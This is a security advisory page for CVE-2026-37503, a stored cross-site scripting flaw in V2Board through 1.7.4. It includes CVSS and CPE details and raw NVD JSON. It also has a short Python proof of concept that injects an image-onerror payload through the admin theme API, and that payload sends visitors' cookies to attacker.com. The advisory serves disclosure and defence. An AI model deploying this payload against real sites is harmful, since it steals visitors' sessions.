Security Vulnerability Report
中文
CVE-2026-37503 CVSS 6.9 MEDIUM

CVE-2026-37503

Published: 2026-05-01 16:16:30
Last Modified: 2026-05-11 19:22:57
Source: [email protected]

Description

Cross-Site Scripting (XSS) in V2Board thru 1.7.4. The custom_html field in theme configuration is rendered using Blade unescaped output in public/theme/v2board/dashboard.blade.php. An admin can inject arbitrary JavaScript via the saveThemeConfig API. All site visitors execute the payload, enabling cookie theft, session hijacking, or phishing.

CVSS Details

CVSS Score
6.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:v2board:v2board:*:*:*:*:*:*:*:* - VULNERABLE
V2Board <= 1.7.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target API endpoint url = "https://target-site.com/api/v1/admin/theme/saveConfig" # Malicious XSS Payload # This payload will send the victim's cookies to an external server xss_payload = '<img src=x onerror=fetch(\"https://attacker.com/steal?c=\"+document.cookie)>' # Request headers with Admin Authorization headers = { "Authorization": "Bearer <ADMIN_ACCESS_TOKEN>", "Content-Type": "application/json" } # Payload data to be saved in theme config payload_data = { "custom_html": xss_payload } try: # Send the POST request to inject the payload response = requests.post(url, json=payload_data, headers=headers) if response.status_code == 200: print("[+] Payload injected successfully!") else: print(f"[-] Injection failed with status code: {response.status_code}") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-37503", "sourceIdentifier": "[email protected]", "published": "2026-05-01T16:16:30.490", "lastModified": "2026-05-11T19:22:57.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Scripting (XSS) in V2Board thru 1.7.4. The custom_html field in theme configuration is rendered using Blade unescaped output in public/theme/v2board/dashboard.blade.php. An admin can inject arbitrary JavaScript via the saveThemeConfig API. All site visitors execute the payload, enabling cookie theft, session hijacking, or phishing."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:v2board:v2board:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.4", "matchCriteriaId": "5514969D-29B0-4D10-A1F8-11154F0BCAF6"}]}]}], "references": [{"url": "https://gist.github.com/sgInnora/1330e1a82caa79906eec55eeff2c99b9", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/v2board/v2board", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.